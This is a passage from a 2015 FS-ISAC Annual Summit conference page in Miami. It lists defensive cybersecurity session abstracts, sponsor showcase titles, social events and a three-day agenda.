Threat Smart | Financial institutions have been addressing information security and technology risks for decades. However, a proliferation of cyber events in recent years has revealed that the traditional approach is no longer sufficient. The executive management team should recognize its leadership role in setting the proper tone and structure for enabling cyber resiliency throughout the organization. They should also recognize the importance of mitigating cyber risks as an essential task in maintaining the on-going success of their institution.

Trust, but Verify: The Evolution of Vendor Risk Management in Financial Institutions | This presentation will first explore the evolving regulatory landscape for Vendor Risk Management and the practices organizations are adopting to meet these more stringent demands. The speakers will then discuss how continuous monitoring of vendor security performance is both critical and achievable through data-driven, evidence-based security ratings. The session will also include a case study of Goldman Sachs’ own industry-leading VRM practices and how the use of performance ratings is transforming their vendor relationships.

Turning Threat Intelligence into Defensive Power | To achieve highly effective operational security, many organizations now accept that deriving specific threat intelligence internally is a key process that needs to be managed, not a product that can be purchased. Just as owning a medical book doesn’t make you a doctor, purchasing threat intelligence feeds doesn’t by itself improve your security.

Attackers’ agility means the time available to protect enterprises against new attack vectors is being compressed. Security teams must therefore be able to translate large volumes of threat information into intelligence rapidly and effectively, to help detect threats and guard the business.

Turn Up the Heat on your Adversaries: Accelerate Targeted Attack Detection and Response | In this presentation, the speakers will chronicle the evolution of the lateral movement and evasion techniques cybercriminals use once they are inside our networks. They will explain why, even in a hybrid cloud environment, cybercriminals have become extremely adept at sandbox evasion. Learn how to limit cybercriminals’ ability to exfiltrate sensitive data and evade current controls. Understand how to stop effective man-in-the-browser techniques, address the use of steganography within a network, and review the latest tactics in lateral movement. Examine how hackers obfuscate their footprints and why threat intelligence plays an important role in protecting sensitive data.

Update on Citi’s Cyber Security Fusion Center | Since opening in September 2014, the Citi Cyber Security Fusion Center (CSFC) has used an intelligence-led methodology to develop capabilities to increase situational awareness of cyber threats, analyze internal data for the detection of anomalous and malicious behavior, and begin the development of cyber-crisis action plans.

The session will describe CSFC efforts and successes to date, plans for future collaborative efforts with the financial sector, and the expansion of CSFC capabilities. A discussion on how the CSFC has been able to utilize the Lockheed Martin Kill Chain in its investigative and analytic work will also be presented.

Sponsor Dine Around

Enjoy a night on the town with this year’s Summit sponsors! On Tuesday, May 19 from 7:00 - 9:00 PM, sponsors will be hosting dinners at various locations throughout Miami. RSVPs will be requested. Dinner and transportation will be the sponsors’ treat! Keep an eye out as we get closer to the Summit for a detailed description of your dinner options.

Beach Blast

Join FS-ISAC at Miami’s premier beach destination, Nikki’s Beach, for the 2015 Annual Summit Beach Blast! Enjoy live entertainment, cocktails, dinner, sponsored cabanas with fun beach giveaways, and epic beach games. The Beach Blast will take place on Monday, May 18 from 7:00 - 9:00 PM and transportation will be provided.


Silver Solution Showcases

Join us for complimentary snacks and refreshments, and a technology showcase where the latest technical innovations in cyber-awareness, proactive security and defense will be on display. In this relaxed setting, attendees get to select up to three solutions they’d like to see. These information-packed 15 minute sessions will be presented by technology experts from our vendor sponsors, will be use-case driven and will be tailored to the unique needs of FS-ISAC members.

• Akamai Cloud Security Solutions: Protecting Banks Worldwide

• Combine the Power of DMARC with Fraud Intelligence, Achieve Full Visibility of Your Email Channel and Take a Proactive Approach to Fighting Fraud

• Detecting Malware Attacks through Behavioral Biometrics - Case Study

• Easy Solutions Unveils DSB Clientless – Lowest-friction Advanced Malware Detection Solution Available Today

• FIDO Universal 2nd Factor – the New Standard for One Touch, Secure Login to Financial Services

• Financial Services in the Cloud Age – See How Firms Are Adopting SaaS Applications While Maintaining Full Control of Regulated Financial Data

• Identify and Prevent Damage from Targeted Attacks with Next-Generation Endpoint Protection

• Illuminating the Dark Web

• Improving your Security Posture with Big Data Cyber Analytics

• Intelligent Cybersecurity Defense Layer

• It’s Time for a Security Wake-up Call: How to Re-think Security

• Leveraging Email Data in Comprehensive Threat Intelligence

• Mobile Visibility, Intelligence & Security

• New Preventive Countermeasure for DDoS and Bot Threats

• Next Generation Application Security in Action with Contrast

• Privileged Threat Analytics: Identify Malicious User Behavior and Stop the Attack in its Tracks

• Rise Above the Risk of Advanced Persistent Threats

• Securing Java Apps with RASP

• Securing Mobile Banking and Payment Applications

• Stealth Security: Catching Evasive Malware in the Act

• To Trust or Not to Trust: Improving Real-time Fraud Detection Performance

• Using STIX/TAXII to Leverage Real-time Behavioral Analytics

• Why Application Whitelisting Makes Sense in Financial Services

• ZeroFOX Enterprise: Social Risk Management


Sunday, May 17
6:00 - 7:00 PM Opening Welcome Reception (Open to all attendees and sponsors)
7:00 - 9:00 PM Sponsored Member Dinners (Closed to sponsors)

Monday, May 18
8:00 AM - 9:00 PM Registration
8:00 - 9:00 AM Board & Member Breakfast
8:30 - 10:00 AM Board Meeting
9:00 AM - 12:00 PM Members Technical Forum
12:00 - 1:00 PM Board and Members Lunch
1:00 - 3:00 PM Leadership Development Workshop
1:00 - 4:45 PM Members Only Meeting
5:00 - 6:00 PM Solutions Showcase (Closed to non-Silver Sponsors)
6:00 - 7:00 PM Networking Reception
7:00 - 9:00 PM Beach Blast
9:00 - 11:00 PM After Hours Hospitality Suite

Tuesday, May 19
7:00 AM - 7:00 PM Registration
7:00 - 8:00 AM Breakfast
8:00 - 8:15 AM Opening Remarks
8:15 - 9:00 AM Keynote
9:00 - 9:45 AM General Session
9:45 - 10:15 AM Networking Break
10:15 - 11:15 AM Concurrent Breakouts
11:30 AM - 12:30 PM Concurrent Breakouts
12:30 - 1:45 PM Birds of a Feather Lunch
1:45 - 2:45 PM Concurrent Breakouts
3:00 - 4:00 PM Concurrent Breakouts
4:15 - 5:15 PM Solutions Showcase (Closed to non-Silver Sponsors)
5:30 - 6:45 PM Networking Reception
7:00 - 9:00 PM Sponsor Dine-Around
9:00 - 11:00 PM After Hours Hospitality Suite

Wednesday, May 20
7:00 AM - 6:00 PM Registration
7:00 - 8:00 AM Breakfast
8:00 - 8:15 AM Opening Remarks
8:15 - 8:45 AM General Session
8:45 - 9:15 AM General Session
9:30 - 10:30 AM Concurrent Breakouts
10:30 - 11:00 AM Networking Break
11:00 AM - 12:00 PM Concurrent Breakouts
12:00 - 1:00 PM Lunch
1:00 - 2:00 PM Solutions Showcase (Closed to non-Silver Sponsors)
2:15 - 3:15 PM Concurrent Breakouts
3:15 - 3:30 PM Closing Remarks and Conference Wrap Up
7:00 - 9:00 PM Sponsored Member Dinners

*Agenda is subject to change. For an up-to-date agenda, visit www.fsisac-summit.com/spring-agenda



12020 Sunrise Valley Dr. Suite 230 | Reston, VA 20191

www.fsisac.com | www.fsisac-summit.com

Gold Sponsors